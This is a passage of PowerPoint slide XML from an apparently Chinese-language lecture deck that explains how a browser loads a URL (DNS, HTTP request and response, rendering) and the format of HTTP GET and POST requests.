                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C60C6B4-9C06-F04F-A741-87B536D1A6C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="1402080"/>
            <a:ext cx="10271760" cy="3978012"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 用户输入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>浏览器查找域名的 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>地址。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>浏览器向 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>服务器发送一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>http </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>包</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>服务器处理请求</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>服务器返回一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>http </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>响应</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>浏览器显示 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>html </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>页面：解析 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>html </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>以构建 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>树 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>–&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>构建渲染树 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>–&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>布局渲染树 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>–&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>绘制渲染树</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35412791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58520" y="187960"/>
            <a:ext cx="5367020" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请求包格式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A15FB8FE-7E29-7A48-9B49-84C82194D8E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="1857"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625599" y="1501139"/>
            <a:ext cx="8650396" cy="5356861"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{265B752D-5167-E443-A63A-DC63C2717B19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624840" y="921196"/>
            <a:ext cx="2118360" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48E7D77E-CC60-9D47-8D2B-058B88F5D6CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1534159" y="1878329"/>
            <a:ext cx="8650396" cy="47853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形标注 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F377FBFD-646F-A94D-B7A3-91507E188EB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9247295" y="2632541"/>
            <a:ext cx="2240280" cy="1101259"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6ED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Hans" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求头，键值对的形式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BABFDC71-BA79-C44E-9126-D477A6377D7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1534159" y="1397931"/>
            <a:ext cx="5628641" cy="4306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7074812-E3AF-C44D-823D-3F49A81A6EB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="1106958"/>
            <a:ext cx="2960795" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000" b="1"/>
              <a:t>请求方法、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2000" b="1" dirty="0"/>
              <a:t>URL/PATH</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000" b="1"/>
              <a:t>、协议版本</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18372513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58520" y="187960"/>
            <a:ext cx="5367020" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请求包格式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{265B752D-5167-E443-A63A-DC63C2717B19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624840" y="921196"/>
            <a:ext cx="2118360" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求</a:t>
            </a:r>
